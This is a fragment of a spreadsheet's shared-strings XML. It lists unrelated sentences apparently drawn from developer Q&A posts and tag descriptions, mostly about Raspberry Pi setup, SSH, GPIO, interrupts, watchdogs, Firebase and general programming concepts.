    <t>I would like these to be exposed by name in sysfs somewhere so that userspace can access  instead of needing to know the magic gpio number and needing to specifically "export" it.</t>
  </si>
  <si>
    <t>Also if I try uwfmgr.exe Volume Protect C: on the console it simply hangs: no reaction, no error, only a forever blinking cursor.</t>
  </si>
  <si>
    <t>Prior to ARMv8, all cache maintenance operations can only be executed in privileged modes.</t>
  </si>
  <si>
    <t>For instance, Effective Java writes (Item 60, page 248):
Another commonly reused exception is IllegalStateException.</t>
  </si>
  <si>
    <t>If configured, the query is verified against the database at compile time and the compilation fails if it is not valid.</t>
  </si>
  <si>
    <t>Although a scanner objects class is private, its interface is public, as declared by this abstract superclass, NSScanner.</t>
  </si>
  <si>
    <t>note that i have X11 forwarding enabled in my remote host properties on Netbeans
I can see that, if I SSH into the Pi myself and
echo $DISPLAY
this returns nothing, empty.</t>
  </si>
  <si>
    <t>For example the following script shows two different ways to minimize the Microsoft Windows Notepad application assuming:
To determine the class name to use, you would need to use an tool such as Microsoft's Spy++.</t>
  </si>
  <si>
    <t>Please see note at the top of the README for instructions on re-enabling static-key cipher suites if your server requires them.</t>
  </si>
  <si>
    <t>If any TARGET is already locked by another user, print a warning and continue locking the rest of the TARGETs.</t>
  </si>
  <si>
    <t>It supports multiple build strategies (create, build, attribute hashes) and associations.</t>
  </si>
  <si>
    <t>The proprietary OS uses an object-based architecture, which encapsulates and protects the integrity of objects.</t>
  </si>
  <si>
    <t>As long as the Raspberry Pi's web interface is secure, ssh log in is disabled (but only log in via keys enabled) I can give www-data access to sudo commands?</t>
  </si>
  <si>
    <t>And it works fine... Because I clear out the known hosts to be safe (with ssh-keygen -R 192.168.1.5) beforehand, I always get the fingerprint warning which I type "yes" (&amp;enter) and then confirm Pi's password (&amp;enter).</t>
  </si>
  <si>
    <t>Please set manifest.custom.codebase property to override the current default non-secure value '*'.</t>
  </si>
  <si>
    <t>error C00CE169: App manifest validation error: The app manifest must be valid as per schema: Line 10, Column 13, Reason: 'IoT_THS_final-uwp' conflicts with pattern declaration  '[-.A-Za-z0-9]+'.</t>
  </si>
  <si>
    <t>I've also changed the layout of the bash by modifying ~/.bashrc, however, I do want to have the original layout of bash (or at least one where I can properly navigate) when I ssh into my Pi.</t>
  </si>
  <si>
    <t>Can the mq-opener (which starts as a unprivileged user) do the double fork() and drop its parent/child connection to the parent?</t>
  </si>
  <si>
    <t>I've added the certificate and I'm not getting the certificate error ("unable to find valid certification path to requested target") anymore.</t>
  </si>
  <si>
    <t>Until then, I will try to disable driver signature enforcement for this installation...
Update
Disabling the signature enforcement worked for me.</t>
  </si>
  <si>
    <t>The uninitialized pointer might lead to memory corruption depending on compiler memory management.</t>
  </si>
  <si>
    <t>It has a property that limits the maximum time the client can attempt to reconnect when failures occur.</t>
  </si>
  <si>
    <t>Then copy the content of the certificate and paste it into &lt;IoTs-Home&gt;/conf/identity/identity-provider/iot-default.xml under &lt;Certificate&gt; element.</t>
  </si>
  <si>
    <t>If it wasn't connected before, you need the create the class
If it was connected before (a reconnect), you have to reinitialize (the class and thus the device)
Step #5
You need to check for changes, in a loop or an interrupt.</t>
  </si>
  <si>
    <t>but I might recommend getting a Kinect and use that instead of your webcam, either through Microsoft's recently released official drivers or using the hacked drivers if your EeePC doesn't have Windows 7 (presumably it does not).</t>
  </si>
  <si>
    <t>A Prepared Statement (or parameterized statement) is a precompiled SQL statement that serves to improve performance and mitigate SQL injection attacks.</t>
  </si>
  <si>
    <t>The PDEs can be entered directly or using the so-called weak form (see finite element method for a description of weak formulation).</t>
  </si>
  <si>
    <t>Setting related CSS classes on the element (ng-valid, ng-invalid, ng-dirty, ng-pristine, ng-touched, ng-untouched) including animations.</t>
  </si>
  <si>
    <t>When triggered, the event handlers change the state of the program, sometimes even by de-registering event handlers.</t>
  </si>
  <si>
    <t>Setting related css classes on the element (ng-valid,
ng-invalid, ng-dirty, ng-pristine, ng-touched, ng-untouched)
including animations.</t>
  </si>
  <si>
    <t>How would you ensure that every place that used these types of bindings was bound to a value that was sanitized by your library (or returned as safe for rendering by your server?)</t>
  </si>
  <si>
    <t>C# 7.2 introduced private protected, non-trailing named arguments, digital separator after base specifier, ref conditional expression, reference semantics for value types, and some more.</t>
  </si>
  <si>
    <t>The object can validate parameters, provide default values, and give domain meaning to the group of parameters.</t>
  </si>
  <si>
    <t>Many other languages use similar constructs, called anonymous functions or lambda abstractions for similar purposes.</t>
  </si>
  <si>
    <t>They can also be used for specifying directory-specific security and user authentication, configuring the PHP installation, file handlers and MIME types, output compression, and more.</t>
  </si>
  <si>
    <t>Gates are Closures that determine if a user is authorized to perform a given action and are typically defined in the  class using the Gate facade.</t>
  </si>
  <si>
    <t>Basic definitions
There are four kinds of intellectual property: patents, copyrights, trademarks, and trade secrets.</t>
  </si>
  <si>
    <t>Also, for the sake of system reliability, it might be better to actually keep the watchdog timer running (not disabling it), and add periodic calls to wdt_reset() inside long loops and functions to prevent inappropriate system resets.</t>
  </si>
  <si>
    <t xml:space="preserve">
Failed to add the host to the list of known hosts
Also added mybitbucket.pub to authorized_keys, but can't connect to Raspberry
I am 98% sure both problems are the result of one misconfiguration: files in  belong to user root.</t>
  </si>
  <si>
    <t>A client error (InvalidRequestException) occurred when calling the
  CreateTopicRule operation: 1 validation error detected: Value
  'my-rule' at 'ruleName' failed to satisfy constraint: Member must
  satisfy regular expression pattern: ^[a-zA-Z0-9_]+$
please can someone help?</t>
  </si>
  <si>
    <t>This program is exactly the same on both Rpi and Mac, but this function behaves differently:
 is from:
var db = admin.database();
var root = db.ref("/");
var systems = root.child("systems/");
sysID is a String which is a unique name, which I encrypt from various (simulated for now) hardware components + user input.</t>
  </si>
  <si>
    <t>With reference to a given (possibly implicit) set of objects, a unique identifier is any identifier which is guaranteed to be unique among all identifiers used for those objects and for a specific purpose.</t>
  </si>
  <si>
    <t>I decided to ask separately about the  issue on StackOverflow:
Python Illegal instruction on Raspberry Pi Zero
So I solved that error, it was caused by packages installed that were compiled for a different architecture so I reinstalled everything with apt-get and now the script works.</t>
  </si>
  <si>
    <t>Basically, as the database secrets are depracated (as it was pointed out in a previus answer), and I couldn't find an Arduino library, that supports the new Firebase Admin SDK, I used Firebase Cloud Functions, with http triggers to store and retrive data from the realtime database.</t>
  </si>
  <si>
    <t>Note on the second command: This will make all files in /GarageDoor have executable permissions.</t>
  </si>
  <si>
    <t>If your app crashes or user switches to tty1 and terminates X there he/she is in bash, logged in.</t>
  </si>
  <si>
    <t>I have just tested on my RPi3B with your setup such as
compiled for Target version: Win 10, version 1803
Microsoft.Azure.Devices.Client v1.17.1
Microsoft.NETCore.UniversalWindowsPlatform v6.1.7
and the runtime failed (Windows IoT Core 10.0.17723.1000
) with the following error:
Could not load file or assembly 'System.Net.Security, Version=4.0.1.2, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a'.</t>
  </si>
  <si>
    <t>FreeBASIC is a free/open source (the compiler is GPL and the runtime library is LGPL with static linking exception), 32-bit &amp; 64-bit BASIC compiler for Microsoft Windows and LInux and a 32-bit compiler for protected-mode extended DOS.</t>
  </si>
  <si>
    <t>Note: I've added already the uses permissions to access the INTERNET @ Manifest.xml.</t>
  </si>
  <si>
    <t>I know I can achieve the same effect with Arduino:
But I was wondering if Arduino somehow supports using anonymous inner classes.</t>
  </si>
  <si>
    <t>However, when I try to access classes in jdk.dio.adc, I get NoClassDefFoundError or when I try to add permissions for ADC, I receive a 'Cannot find class for permissions jdk.dio.adc.ADCPermission'.</t>
  </si>
  <si>
    <t>Another reason to avoid alert in production code is that it can be disabled by the user.</t>
  </si>
  <si>
    <t>This should be a way to detect a valid device such as ... 
or
or
Your code should be clearing h and t to 0 before making the read so that you can test for valid values.</t>
  </si>
  <si>
    <t>In other words it states that all non-key attributes should be determined by the candidate keys and not by any non-key attributes.</t>
  </si>
  <si>
    <t>By default, RFC 2109 cookies are treated according to the RFC 2965 rules.</t>
  </si>
  <si>
    <t>It will be helpful if anyone state which is Keys to Lock So that in add in my Python script for locking phone programmatically.</t>
  </si>
  <si>
    <t>Because If I don't do this, I have this error
OS Error: [Errno -9993] Illegal combination of I/O device
I think that this error occurs because I'm trying to listen just after the call of the function say and the file is still open.</t>
  </si>
  <si>
    <t>Can i somehow allow the device to generate the key pair on its own and just upload the public key to my lambda And make the lambda do all the registrations with just that?</t>
  </si>
  <si>
    <t>There is no remote debugging property, I can not select any arm CPU type nothing.</t>
  </si>
  <si>
    <t>Check this out: https://www.ostechnix.com/a-beginners-guide-to-cron-jobs/
This will make it run independent of your user login to a shell.</t>
  </si>
  <si>
    <t>jwerty is a JavaScript library which allows binding, firing and asserting key combination strings against elements and events.</t>
  </si>
  <si>
    <t>The recognizer instances you
create a being executed in the order they are added, and only one can be recognized at the time.</t>
  </si>
  <si>
    <t>Note: you don't
  need to be root to run this, however the script will perform certain
  tasks using sudo and the root password will be requested during the
  script execution.</t>
  </si>
  <si>
    <t>In the TTY it works just fine and both functions are returning my username, but executed in the LXDE Terminal, the following error occurs:
I am running this code an a Raspberry Pi 2 B with Raspbian installed.</t>
  </si>
  <si>
    <t>I have a docker-compose file which looks like:
I'm using a mongoDB container for the raspberry pi built by someone else (I just pulled it from docker-hub), the issue is if for any reason there is an improper shutdown, the container fails to deal with the mongod.lock file in the /data/db directory.</t>
  </si>
  <si>
    <t>Note: you don't need to be root to run this, however the script will perform certain tasks using sudo and the root password will be requested during the script execution.</t>
  </si>
  <si>
    <t>If your app attempts to access a protected item without you having provided a corresponding purpose string, your app exits.</t>
  </si>
  <si>
    <t>Also, from Crypto++ Issue 846, ARM and "unexpected reloc type 0x03" loading shared object, I know it is not as simple as using -fPIC.</t>
  </si>
  <si>
    <t>This is generally the exception to throw if the invocation is illegal because of the state of the receiving object.</t>
  </si>
  <si>
    <t>Therefore, my question is, if there is a way to inform the compiler about PASSWORD's length and to use this length as a variable in the code, without having the user counting the elements herself?</t>
  </si>
  <si>
    <t>I have a topic cloud function that is triggered by this message and I would like to have the device configuration updated, however I am unable to do so due to the following permission error.</t>
  </si>
  <si>
    <t>To access this device, your user will need to be a member of
  the gpio group, and you may need to configure udev with the following
  rule (as root):
For access to ic, PWM, and SPI, or if you are running
  an older kernel which does not have the bcm2835-gpiomem module, you
  will need to run your programs as root for access to /dev/mem.</t>
  </si>
  <si>
    <t>The generated private instance variable, ivar, created for you by Xcode has a leading underscore '' if you don't explicitly create your own @synthesize statement.</t>
  </si>
  <si>
    <t>To transmit, You will need to disable interrupts (or mask them) so that your transmission will not be interrupted (especially important for a single wire implentation).</t>
  </si>
  <si>
    <t>It enables common USB-to-serial adapters to work with Android devices that have USB host mode without needing to root.</t>
  </si>
  <si>
    <t>Software using the Public Suffix List will be able to determine where cookies may and may not be set, protecting the user from being tracked across sites.</t>
  </si>
  <si>
    <t>You can create a column master key in a key store and its corresponding metadata object in the database by using the Object Explorer in SQL Server Management Studio or PowerShell.</t>
  </si>
  <si>
    <t>Ansible Vault is a feature and an executable program () in Ansible family, allowing encryption of variable files, as well as tasks and handlers.</t>
  </si>
  <si>
    <t>(~/.bashrc)
My problem is: I don't know how to make a script that runs at start up that can  auto login to the Raspberry Pi while disabling the Graphical interface in order to make it run headless.</t>
  </si>
  <si>
    <t>With the use of threads and locks, the sensors would update continuously the Variable Manager (with while loops in the corresponding drivers), while the GUI would query certains values whenever I need.</t>
  </si>
  <si>
    <t>The most common use case for this, in my experience, is where you have a device in the field, and you replace the "main board" that includes the secure element.</t>
  </si>
  <si>
    <t>OpenID Connect (OIDC) is a REST-friendly protocol for the (possibly cross-domain) exchange of user identity built on top of the OAuth 2.0 and JWT specifications.</t>
  </si>
  <si>
    <t>Inodes store information about files and directories (folders), such as file ownership, access mode (read, write, execute permissions), and file type.</t>
  </si>
  <si>
    <t>This allows fast access to individual elements, since once a hash is computed, it refers to the exact bucket the element is placed into.</t>
  </si>
  <si>
    <t>To be secure by default, you want to ensure that any such bindings are disallowed unless you can determine that something explicitly says it's safe to use a value for binding in that context.</t>
  </si>
  <si>
    <t>Firebase Admin SDK grants elevated privileges on the server-side, to features like:
Firebase Database (Realtime Database and Cloud Firestore)
Firebase Authentication
Firebase Storage
Firebase Cloud Messaging</t>
  </si>
  <si>
    <t>Any help will be much appreciated
I have tried callback as shown below
but I am getting an error as shown below
File "test.py", line 19, in GPIO.add_event_detect(21, GPIO.RISING, callback=my_callback) RuntimeError: Conflicting edge detection already enabled for this GPIO channel</t>
  </si>
  <si>
    <t>As such I would like to use my Twitter profile as a way to pat a watchdog bash script (on raspbarian) - when the profile changes, the watchdog detects it and would then perform an action.</t>
  </si>
  <si>
    <t>When the watchdog timer is enabled, a call
  to this instruction is required before the timer expires, otherwise a
  watchdog-initiated device reset will occur.</t>
  </si>
  <si>
    <t>This type of problem is what so called "interrupts" were invented for, which allow you to respond to events that may occur while you are not monitoring the pin of interest.</t>
  </si>
  <si>
    <t>On a Raspberry Pi, these things can cause a bit of a catch-22 when working with GPIOs because the GPIO device is locked down and not accessible to unprivileged users without a change of permissions and groups.</t>
  </si>
  <si>
    <t>Note :  API launches executables under the current user credentials, or DefautlAccount, so apps requiring admin priviliges will fail to run properly.</t>
  </si>
  <si>
    <t>The edge detection of the 'clock' signal can also be performed by a pin change interrupt which you just disable for the dead time period after the interrupt occurred.</t>
  </si>
  <si>
    <t>A signature file contains information about the public signatures of a set of F# program elements, such as types, namespaces, and modules.</t>
  </si>
  <si>
    <t>The second definition is motivated by the fact that in many OOP languages hiding of components is not automatic or can be overridden; thus, information hiding is defined as a separate notion by those who prefer the second definition.</t>
  </si>
  <si>
    <t>Functions similar in name and purpose to (and possibly implemented by) the Unix crypt(3) function are also found in several high-level languages, including PHP, Perl and Python.</t>
  </si>
  <si>
    <t>The constructors of this class assume that the default character encoding and the default byte-buffer size are acceptable.</t>
  </si>
  <si>
    <t>This is achieved by grouping together validation functions in "modules", making it possible for the programmer to load only those functions that's needed to validate a particular form.</t>
  </si>
  <si>
    <t>Character encoding is the act or result of representing characters (human readable text) as a series of bytes (computer readable zeroes and ones).</t>
  </si>
  <si>
    <t>Classification simply reports the confidence of a certain type of object within the image and detection adds on identifying the object's location.</t>
  </si>
  <si>
    <t>The good thing about anon auth is, if you change your mind later and add a screen / a companion app, you can keep the user data
You can use Firebase Authentication to create and use temporary anonymous accounts to authenticate with Firebase.</t>
  </si>
  <si>
    <t>But they occur in any way with aps acknowledgment disabled, too.</t>
  </si>
  <si>
    <t>Here is what I have so far, I'd like to hide interrupts from the user.</t>
  </si>
  <si>
    <t>Interrupts are enabled.</t>
  </si>
  <si>
    <t>I am ssh'ing into my rasperrybi and running a python script.</t>
  </si>
  <si>
    <t>In Ubuntu the  sysfs is not enabled by default.</t>
  </si>
  <si>
    <t>C:/SysGCC/Raspberry/bin/arm-linux-gnueabihf-g++ -c
  -fvisibility=hidden fvisibility.c Symbol visibility control enabled.</t>
  </si>
  <si>
    <t>Let's say I have a Python script file on the Pi that I execute over SSH.</t>
  </si>
  <si>
    <t>I have disabled the bcm watchdog and we are now watchdogless (/dev/watchdog disappears).</t>
  </si>
  <si>
    <t>SSH is disabled by default.</t>
  </si>
  <si>
    <t>Is there a way to customize the authentication box, or at least change the type of the password field?</t>
  </si>
  <si>
    <t xml:space="preserve"> has type boolean
So this:
is invalid as boolean is not of a pointer type.</t>
  </si>
  <si>
    <t>I am wondering why you can't login via ssh; it's enabled by default.</t>
  </si>
  <si>
    <t>The kernel pin is determined by the offset from 44e10.</t>
  </si>
  <si>
    <t xml:space="preserve">
The user running the script must be able to sudo.</t>
  </si>
  <si>
    <t>To pass your password to the sudo command, use sudo -S *command* &lt; &lt;(echo -e "*pass*\n") in your script shell.</t>
  </si>
  <si>
    <t>For bluetooth v2 you need a HID-enabled bluetooth module.</t>
  </si>
  <si>
    <t>I think pi has ssh server enabled by default.</t>
  </si>
  <si>
    <t>A form of intellectual property.</t>
  </si>
  <si>
    <t>GM_xmlhttpRequest is a method available to GreaseMonkey scripts.</t>
  </si>
  <si>
    <t>What may infringe intellectual property rights.</t>
  </si>
  <si>
    <t>Font Lock mode is enabled by default.</t>
  </si>
  <si>
    <t>It checks the access control list (ACL) of
the .aspx or .asmx handler file to determine whether a user should
have access to the file.</t>
  </si>
  <si>
    <t>You can use the unsafe modifier in the declaration of a type or a member.</t>
  </si>
  <si>
    <t xml:space="preserve"> is a method available to Greasemonkey scripts.</t>
  </si>
  <si>
    <t>Use the optional output to determine the error...most likely permission, current directory or user settings...think if the phone user account is the same as the one you are testing with on the console
http://php.net/manual/en/function.exec.php</t>
  </si>
  <si>
    <t>default deny semantic
Prior to Servlet 3.1, if the given HTTP methods are not covered by the given security constraint for given URL patterns, then the HTTP methods are not protected for the corresponding URL patterns.</t>
  </si>
  <si>
    <t>It sounds like you need to modify the permissions of the file to be readable/writable/executable by the user you log into the GUI with.</t>
  </si>
  <si>
    <t>You are protecting EVERYTHING with a mutex, though you should only protect variables that are shared between the different threads.</t>
  </si>
  <si>
    <t>I have set up git+gitolite on my raspberry pi (Debian, wheezy)
I have a git user and wanted to add some extra security by disabling the log-in shell for it.</t>
  </si>
  <si>
    <t>000-default.conf
default-ssl.conf:
Does someone see my mistake I made?</t>
  </si>
  <si>
    <t>If you prefer type your password each time your script is runned, then just don't add this key to authorized_keys.</t>
  </si>
  <si>
    <t>The key points are:
Use the  mode of letsencrypt
Make a copy of the certs readable by gitlab-shell</t>
  </si>
  <si>
    <t>There are two common types of MAC functions:
hmac functions are based on a cryptographic-hash-function, e.g.</t>
  </si>
  <si>
    <t>For example: 'yyyy-mm-dd'
event.valid: Boolean value indicating is the input field value valid or not.</t>
  </si>
  <si>
    <t>You could configure sudoers to securely allow user "pi" to execute only gggg.py (or whatever webserver you'll end up using for production).</t>
  </si>
  <si>
    <t>If so, you may need to add your account to the correct group, the serial port device belongs to.</t>
  </si>
  <si>
    <t>Update:
And it is not recommended register a device in the MainPage function since it will always be executed every time the app is started.</t>
  </si>
  <si>
    <t>So a function could be:
You can have a function in the integration class that runs all tests, all authentication related tests etc.</t>
  </si>
  <si>
    <t>A weak reference is a reference that does not protect the referenced object from garbage collection.</t>
  </si>
  <si>
    <t>At the top of my script I open a connection to OWM using the API key I obtained when I registered for a free account.</t>
  </si>
  <si>
    <t>To do this, I've created a protected member variable (m_PixelChannel) which stores the pin required to access the light string.</t>
  </si>
  <si>
    <t>This function can be a security risk and, as such, this function is commonly disabled in shared hosting environments.</t>
  </si>
  <si>
    <t>You can, optionally, use keys to ensure that later attempts to insert an object into an object store that already contains an object with the same key will produce an error.</t>
  </si>
  <si>
    <t>A common type of CAPTCHA requires the user to type letters or digits from a distorted image that appears on the screen.</t>
  </si>
  <si>
    <t>I am trying this with listKeys function and output these inside the template JSON file:
}
When I output the returned Object in Windows Powershell it looks like this:
My Question: Can anyone tell me how to access the "primaryKey" in the different "keyName" Objects?</t>
  </si>
  <si>
    <t>In general you should also be checking to make sure that the list is the size you want anyway, because otherwise any malformed data can crash your program.</t>
  </si>
  <si>
    <t>Java Exception that is thrown to indicate a problem with the JSON API, as attempts to parse or construct malformed documents, use of null as a name or type mismatches on lookups.</t>
  </si>
  <si>
    <t>In some languages, one can get a value representing the object's identity, or address (although this token is only valid during the object's lifetime):
In c &amp;a
In python id(b)</t>
  </si>
  <si>
    <t>Thrown when the VM notices that an attempt is made to load a class which does not pass the class verification phase.</t>
  </si>
  <si>
    <t>Update
I found a note in AVR-CDC Windows Driver Section saying:
(*) Vista/7 x64 does not accept unauthorized kernel-mode drivers.</t>
  </si>
  <si>
    <t>Also, forgetting to disable interrupts can lead to very nasty and hard to find bugs (the nastiest bug I encountered so far was of exactly this kind).</t>
  </si>
  <si>
    <t>So for a device the same thing is achieved with a publish to:
iot-2/evt/statusEvent/fmt/json
The Platform uses the identity of the device making the publish to determine which device that belongs to, whereas with an application the application decides which device to assign the event to.</t>
  </si>
  <si>
    <t>A C#/.NET exception class, InvalidCastException is thrown when an invalid type casting is being performed, or an invalid explicit conversion is attempted.</t>
  </si>
  <si>
    <t>However, you can set the data type to a different type such as System.DateTime in which case the editor will ensure that the value entered by the user is a valid date.</t>
  </si>
  <si>
    <t>Command
qdbus --system org.bluez /org/bluez/hci0/dev_XX_XX_XX_XX_XX_XX/fdX
  org.freedesktop.DBus.Properties.Set org.bluez.MediaTransport1 Volume
  127
Response
Error: org.freedesktop.DBus.Error.InvalidSignature Invalid signature
  for Volume
I have tried scouring the internet to come up with various payloads and nothing has worked.</t>
  </si>
  <si>
    <t>require dhcp_server_identifier
# Generate Stable Private IPv6 Addresses instead of hardware based ones
slaac private
# A hook script is provided to lookup the hostname if not set by the DHCP
# server, but it should not be run by default.</t>
  </si>
  <si>
    <t>The single password for access is known at compilation time and looks something like this
To compare the user input with , I need several other arrays (not all of them with the same data type) that have the same number of elements as PASSWORD.</t>
  </si>
  <si>
    <t>Putting code into an early .init section provides access to the raw uninitialized RAM content before it is overwritten by gcc's initialization routines.</t>
  </si>
  <si>
    <t>If you are afraid that other unprivileged processes might connect to the daemon too and make it execute commands it shouldn't, you could make its socket owned by a special group and  the Java application to that group by a tiny wrapper written in C before it is started.</t>
  </si>
  <si>
    <t>The answer is as pointed out by aja - I was using the wrong descriptor, it should be 
The full script to enable the HID device on a raspberry pi zero therefore looks like this (mostly copied from the links mentioned in my first question).</t>
  </si>
  <si>
    <t>A Package can be defined as a grouping of related types(classes, interfaces, enumerations and annotations ) providing access protection and name space management</t>
  </si>
  <si>
    <t>An SML (Standard Machine Learning) stable identifier is a stable identier is a path which ends in an identier, which is bound to values in many functional programming languages.</t>
  </si>
  <si>
    <t>Amazon Macie recognizes sensitive data such as personally identifiable information (PII) or intellectual property, and provides dashboards and alerts that give visibility into how this data is being accessed or moved.</t>
  </si>
  <si>
    <t>Triggers
Triggers are events occurring on your phone, such as receiving a text message, unlocking the screen, finding a new WiFi network, etc.</t>
  </si>
  <si>
    <t>System.Web.Security.SqlMembershipProvider  
Namespace:  System.Web.Security
Assembly:  System.Web (in System.Web.dll)
To manually create the database, run the Aspnet_regsql.exe executable found in the %systemroot%\Microsoft.NET\Framework\ versionNumber folder and specify the -A m option (for example aspnet_regsql.exe -A m).</t>
  </si>
  <si>
    <t>URI requests are served from the current working directory where PHP was started, unless the  option is used to specify an explicit document root.</t>
  </si>
  <si>
    <t>This basic information is stored in a hidden master (it can be exposed through View Settings)and serves as the default for the definition.</t>
  </si>
  <si>
    <t>Tag Types:  
Type 1: Type 1 NFC tags have data collision protection and can be set to either read and rewrite capable or read-only.</t>
  </si>
  <si>
    <t>Type 3: Also equipped with data collision protection, NFC tag type 3 has larger memory and faster speeds than tag types 1 and 2.</t>
  </si>
  <si>
    <t>Post updated:
dmesg: 
gpio: Unknown symbol mtd_device_parse_register (err 0)
gpio: Unknown symbol nand_scan (err 0)
gpio: Unknown symbol nand_release (err 0)
export_store invalid GPIO 17
ls -l /sys/class/gpio
  1 total 0
  2 --w------- 1 root root 4096 Dec  9 16:02 export
  3 --w------- 1 root root 4096 Dec  9 16:02 unexport</t>
  </si>
  <si>
    <t>The only occurrences of  are these:
Global variable declaration and initialization: byte currentPasswordLength = 0;
Incrementation in processNumberKey: currentPasswordLength++;
Compare and call activate in processNumberKey: if (currentPasswordLength == maxPasswordLength) {
The third one also explains why the deactivation (second round) fails after the second key press as maxPasswordLength is 6 and after the activation the currentPasswordLength is 4.</t>
  </si>
  <si>
    <t>I was dealing with the same problem today and the reason bitbake couldn't find ssh is that since rocko, the OpenEmbedded developers decided to sanitize the build environment by replacing PATH with a directory containing symlinks to "approved" native binaries.</t>
  </si>
  <si>
    <t>To be able to use PhpMyAdmin now you have to have php version 5.5 or higher installed
to install php version 7.0 you have to do the folowing steps : 
open sources.list :  
add these lines to file:
then exit nano and run this command (ctrl+X then y and then Enter) : sudo gpg --keyserver pgpkeys.mit.edu --recv-key CCD91D6111A06851
also run this command: sudo gpg --armor --export CCD91D6111A06851 | sudo apt-key add -
PhpMyAdmin also requires MySql 
run sudo apt-get install mysql-server python-mysqldb
run sudo apt-get update</t>
  </si>
  <si>
    <t>I am trying to let my Raspberry Pi run a script that triggers a SSH command to another Raspberry Pi on my LAN network that runs another script.</t>
  </si>
  <si>
    <t>SQL Mail is provided in Microsoft SQL Server for backward compatibility.</t>
  </si>
  <si>
    <t>Lambdas are anonymous functions or closures in programming languages such as Lisp, C#, C++, Lua, Python, Ruby, JavaScript, or Java.</t>
  </si>
  <si>
    <t>If a request specifies a JSESSIONID, the server will use it if it determines if it is valid.</t>
  </si>
  <si>
    <t>Make sure that you are part of the user group net-dev using the command 
getent group netdev
and if not, you can add yourself using 
sudo usermod -a -G netdev userName
Next, add the following block to the /etc/network/interfaces file on each Pi:
auto wlan0
allow-hotplug wlan0
iface wlan0 inet static
   address 10.10.2.1
   netmask 255.255.255.0
pre-up wpa_supplicant -B -D nl80211 -i wlan0 -c /etc/wpa_supplicant-adhoc.conf
where each Pi has a different address field beginning with 10.10.2.. Also, if your RT5370 adapter is using an interface other than wlan0 (e.g.</t>
  </si>
  <si>
    <t>When the event pDetected is fired, the callback to the pDetected works.</t>
  </si>
  <si>
    <t>The script works if it is running itself but at the shutdown routine the ssh command is not executed.</t>
  </si>
  <si>
    <t>I want to remotely disable or enable the D0 pin.</t>
  </si>
  <si>
    <t>Looks like SSH is disabled by default on all new Jessie images.</t>
  </si>
  <si>
    <t>However, my IBM Blockchain instance never gets discovered by my Watson IoT instance.</t>
  </si>
  <si>
    <t>I am building an motion detection security camera with a raspberry pi https://www.raspberrypi.org/learning/parent-detector/worksheet/.</t>
  </si>
  <si>
    <t>(Besides, the default pi user has root permissions by default anyways.)</t>
  </si>
  <si>
    <t>I'm trying to create a tampermonkey script that runs on Chromium on a Raspberry PI2 with Rasbian, but I have no idea how to do it.</t>
  </si>
  <si>
    <t>However, I never enable the software watchdog.</t>
  </si>
  <si>
    <t>However, is there a way to speed this up and somehow enable the wifi as soon as it is disabled?</t>
  </si>
  <si>
    <t>I would recommend that you confirm that your probes are wired the way you think they are... i.e.</t>
  </si>
  <si>
    <t>However, disabling interrupts for as long as 400 ms is frowned upon.</t>
  </si>
  <si>
    <t>If you disable the watchdog from your project, do you still get the same outcome?</t>
  </si>
  <si>
    <t>In the last step of the initialization, only the transmitter is enabled and not the receiver.</t>
  </si>
  <si>
    <t>The only way to access child elements is using root.</t>
  </si>
  <si>
    <t>Then verify that that user has permission to execute your python script.</t>
  </si>
  <si>
    <t>I think there are sshfs solutions, but I don't know how stable or usable they are.</t>
  </si>
  <si>
    <t>It shouldn't matter what else you're doing, as long as interrupts are enabled.</t>
  </si>
  <si>
    <t>There are some models of the Bluetooth Mate Silver module with HID firmware that should work as an HID device with iOS.</t>
  </si>
  <si>
    <t>The pi (or any unix system) doesn't really distinguish between a "console" login or a ssh (remote) login, it's going to drop you into a shell anyway.</t>
  </si>
  <si>
    <t>disable watchdog
timers).</t>
  </si>
  <si>
    <t>So to show the hidden devices, I chose View &gt; show hidden.</t>
  </si>
  <si>
    <t>If you wanted to live dangerously you could enable interrupts inside the ISR and use a flag to prevent reentry.</t>
  </si>
  <si>
    <t>Apparently, the SSH server on Raspbian is now disabled by default.</t>
  </si>
  <si>
    <t>By default, we have enabled OAuth as the authentication mechanism.</t>
  </si>
  <si>
    <t>All interrupts are individually masked with the Timer Interrupt Mask Register 0
(TIMSK0).</t>
  </si>
  <si>
    <t>Subsequently you decode the payload in the Lambda function.</t>
  </si>
  <si>
    <t>in linux are hidden by default, but not in windows.</t>
  </si>
  <si>
    <t>It must be 
   #!/bin/bash
And check execute permissions on this script</t>
  </si>
  <si>
    <t>But it can be protected using the GUID for the volume.</t>
  </si>
  <si>
    <t>umask is a Unix command to specify default permissions for the new files, created by the current user.</t>
  </si>
  <si>
    <t>An opaque type property that can have multiple values.</t>
  </si>
  <si>
    <t>You can have your users build their own templates without affecting your server security in any way.</t>
  </si>
  <si>
    <t>Regular Expression for .htaccess file.</t>
  </si>
  <si>
    <t>Bolt is a security and rules compiler for Firebase.</t>
  </si>
  <si>
    <t>Python Object Wrapper for ArangoDB with built-in validation</t>
  </si>
  <si>
    <t>Contrary to arrays, the key type of a Hash can be of any type.</t>
  </si>
  <si>
    <t>A phony makefile target is a target that is not associated with a file name.</t>
  </si>
  <si>
    <t>It can be executed by executing `dotnet dev-certs`.</t>
  </si>
  <si>
    <t>StreamWriter defaults to using an instance of UTF8Encoding unless specified otherwise.</t>
  </si>
  <si>
    <t>Hide your IP
Run SSH, telnet, wget, ftp, apt, vnc, nmap through proxy servers.</t>
  </si>
  <si>
    <t>OpenID Connect is a protocol build on top of OAuth2.0 and OpenID.</t>
  </si>
  <si>
    <t>Swift arrays are type safe, and are always clear about what they may contain.</t>
  </si>
  <si>
    <t>For more information:
the FirebaseUI-Android Github repo
the FirebaseUI-iOS Github repo
Related tags
firebase-database
firebase-authentication
firebase-storage</t>
  </si>
  <si>
    <t>"UTC", "UTC-02", "UTC-08", "UTC-09", "UTC-11", and "UTC+12" are valid identifiers, but other offsets are not.</t>
  </si>
  <si>
    <t>AutoFixture can help by creating such Anonymous Variables for you.</t>
  </si>
  <si>
    <t>Then this satisfies the property "What you See is What you Sign" and is thus legally valid.</t>
  </si>
  <si>
    <t>I am looking for guidance to protect the cgi-bin directory and verify a logged in user is accessing the bash script.</t>
  </si>
  <si>
    <t>If you want to make a service accessible with added authentication, then you'll need to look at using something like an SSH tunnel or HTTP proxy instead.</t>
  </si>
  <si>
    <t>Can be used with an IEnumarable of an anonymous class - which is often returned by a LINQ query.</t>
  </si>
  <si>
    <t>I did try everything now and i cant figure out how to get the bash to echo to the user logged in locally.</t>
  </si>
  <si>
    <t>a signed char or an int) you needed it since the function was expecting that kind of variable.</t>
  </si>
